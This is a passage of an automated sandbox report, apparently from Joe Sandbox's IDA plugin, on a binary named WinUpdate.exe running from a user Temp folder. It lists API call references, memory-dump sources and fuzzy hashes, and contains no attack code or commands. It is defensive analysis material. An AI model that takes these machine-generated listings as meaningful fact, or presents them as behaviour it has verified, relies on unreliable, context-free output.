                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10015897
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 100158AA
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 100158BB
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 100158CC
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
                                                                                                                                                                                                                                                                                                • Instruction ID: ce460e5bac6ae8aad040ed738a165eee73e0f07a81d148bf5aaa982fd25e43d9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADF03074844A35DBE601EF549CC1C1537A0FB487113BD4A4AF4506E271C732A6838F82
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E6536F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: RtlFreeHeap.NTDLL(00000000,00000000,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?), ref: 02E65734
                                                                                                                                                                                                                                                                                                  • Part of subcall function 02E6571E: GetLastError.KERNEL32(?,?,02E6924F,?,00000000,?,00000000,?,02E69276,?,00000007,?,?,02E67E5A,?,?), ref: 02E65746
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65381
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E65394
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E653A5
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E653B6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: df38de4e1d8bd626717a00a6688be76cde745f613ad6118a9e99799b5f819260
                                                                                                                                                                                                                                                                                                • Instruction ID: cf80ab7b83cff4114eb0a1fb0a5a0985b40de74565d76045bbe115a815930b21
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: df38de4e1d8bd626717a00a6688be76cde745f613ad6118a9e99799b5f819260
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85F0B470DD0115DB86A5EF37F8484583FB2B704BA43C9998AF81097650D73014E9EF91
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10005A13
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10005A1D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                • Opcode ID: a948c79c5431ef993d5c7db46d81cca16daa77eda4f2e5c9dff6410b726f20a4
                                                                                                                                                                                                                                                                                                • Instruction ID: 1f1fc70b04df716a51afbffcc927e8f2192dc69e1f8a2574b42c8594fe6aa3ea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a948c79c5431ef993d5c7db46d81cca16daa77eda4f2e5c9dff6410b726f20a4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4E15075A0020ADBDB20CF48D5C099FB7B6FF84392B204529E8459B218DB32FE55CBE1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                • API String ID: 0-4289949731
                                                                                                                                                                                                                                                                                                • Opcode ID: ccb344d31eb48d848c024517a1bbcab67a45931089d07f9d91156cb093629b5a
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e0e01030c44db973a3d1f6ba28005194938e7e7133fae708877df5374af968a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ccb344d31eb48d848c024517a1bbcab67a45931089d07f9d91156cb093629b5a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48717F35B046099BDB24CE5CD88099FB3F6FF89392720492EE946C7304DB32EA50CB91
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10005B96
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10005BA0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                • Opcode ID: d9f5af590ba494f503317526f7cd22f2d922a699b17cc1a85d23b8301829a4f6
                                                                                                                                                                                                                                                                                                • Instruction ID: 6c1523fb328dcf9ae6a9c50ad7b05ab603d263373fb6ba5bb73130adc7b49d3b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9f5af590ba494f503317526f7cd22f2d922a699b17cc1a85d23b8301829a4f6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE4181717047098FA724DE58E8C095BB3E9FF846863610A2EF442C7619EB32FD15C7A1
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe,00000104), ref: 10014D25
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10014DF0
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 10014DFA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                                • API String ID: 2506810119-3070535726
                                                                                                                                                                                                                                                                                                • Opcode ID: eaf83b87ec4df31a7860cee0cd6db682f0658942e23e4816ef17e9f2f1853395
                                                                                                                                                                                                                                                                                                • Instruction ID: 1e7dba0bb730f9fc9de03a9782a9729fb1a7a61e514cee30f29b5b303d88c0bb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaf83b87ec4df31a7860cee0cd6db682f0658942e23e4816ef17e9f2f1853395
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83316175A00258AFDB11DF95DC81D9EBBFCEB89750B2140A6F8049B221DA71DA81CB91
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe,00000104), ref: 02E64C1D
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E64CE8
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 02E64CF2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4591274972.0000000002E61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591212270.0000000002E60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4591274972.0000000002E76000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_2e60000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\WinUpdate\WinUpdate.exe
                                                                                                                                                                                                                                                                                                • API String ID: 2506810119-3070535726
                                                                                                                                                                                                                                                                                                • Opcode ID: 12a846d248d6522e3f30cb30c347bc0cc63634ba2784b0b9207b33b743e5c9ff
                                                                                                                                                                                                                                                                                                • Instruction ID: 27363c87185f49b9a93471fff25976b0b1add0ee8838b7c09b685f988aaf89da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12a846d248d6522e3f30cb30c347bc0cc63634ba2784b0b9207b33b743e5c9ff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE319571AC0208AFDB31DF9A8888DEEBBFEEB85794B149056E40497340D7718A41DB60
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10004988
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 10004992
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                • Opcode ID: f219f81f2db817a89c88b3221649508d6ef427ce8f5576a44e3a57a9eb601318
                                                                                                                                                                                                                                                                                                • Instruction ID: 5dc71b71bde44702d26a4cbc12f9298653d6fc4ab722c143c4ed6f2fd59d79f2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f219f81f2db817a89c88b3221649508d6ef427ce8f5576a44e3a57a9eb601318
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C31BC763053058BAB24CF5CF88095BB3E9FF857913120A3EE546C7619DB31E91487A9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 100040D8
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 100040E2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                                                                • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                                                                • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                                                                • Opcode ID: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
                                                                                                                                                                                                                                                                                                • Instruction ID: dceabf25fecf4d0f8060b32b9c351c32afdfa4cc9e92bfec45e796551365fa88
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9431D4B6700700CFE724CF5CE880B5BB3E5EF90691B120A2EF652C7649CB72E95087A5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1000A2BF
                                                                                                                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 1000A2D1
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A308
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow
                                                                                                                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                                                                                                                • API String ID: 282849329-2556327735
                                                                                                                                                                                                                                                                                                • Opcode ID: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                                                                                • Instruction ID: 3b0e7b0924b02afa82a32a789def5d0431f475eb5fa42c660e1d048d1314c2f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13f2c9ee93d70e8ef895b86efb1adb1bbc0a17a491a056a2fa8bd6fe5aea7e05
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C01191342087409BF732CF188881B0A77F1EF43680F614B5CF4D65B28ACB72B6848762
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 5b6d60a7e950da7f05ea47b616e82c5f5aeb43730b0ef79f46640cbcda0275c7
                                                                                                                                                                                                                                                                                                • Instruction ID: e79e6140dbdac80e9811d453051d084bfb344763f1955d97d793d42e1ffb776b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6d60a7e950da7f05ea47b616e82c5f5aeb43730b0ef79f46640cbcda0275c7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBA1237690028A9FE716CE28C8917AABBF5FF15290F1541ADE9899F282C234DDC1C790
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • new.LIBCMT ref: 10006C8E
                                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 10006D68
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 10006D6D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3339364867-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 2e818ad779f7f3d03d5c84d06b9865814cbd875c5e08a6123d96dc269186004b
                                                                                                                                                                                                                                                                                                • Instruction ID: 4d0b3fd10050543d74c0a9d0191834ad5b053cb97790e6a37b58efb3ad3a7c81
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e818ad779f7f3d03d5c84d06b9865814cbd875c5e08a6123d96dc269186004b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3310775B001059FEB04DF68CDC196977E6EF483C0724816AE80A8F24DD731EE51C791
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 1000476A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 1000ADE3: __CxxThrowException@8.LIBVCRUNTIME ref: 1000ADFA
                                                                                                                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 1000477F
                                                                                                                                                                                                                                                                                                • new.LIBCMT ref: 10004785
                                                                                                                                                                                                                                                                                                • new.LIBCMT ref: 10004799
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.4592506553.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592466588.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592506553.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.4592797955.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_10000000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3339364867-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 68b20fe3f0c7c7f050f6ef4f1c12fb3c291c9bfd78cfe9bd81b3364575ba11aa
                                                                                                                                                                                                                                                                                                • Instruction ID: b996118a61bf9d45cc2d2cea6005222f19e008b26fe8e61431029879d97c69ca
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68b20fe3f0c7c7f050f6ef4f1c12fb3c291c9bfd78cfe9bd81b3364575ba11aa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 903106F5A046019FE720CF24D98161AB3E5FB457D0F220B2DE82ACB684DF30E944C7A5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,0BFC45C6,00000008,00000000,00000000,1000310F,100147D8,100147D8,?,00000001,00000008,0BFC45C6,00000001,1000310F,00000000), ref: 1001CE6B
                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 1001CEF4
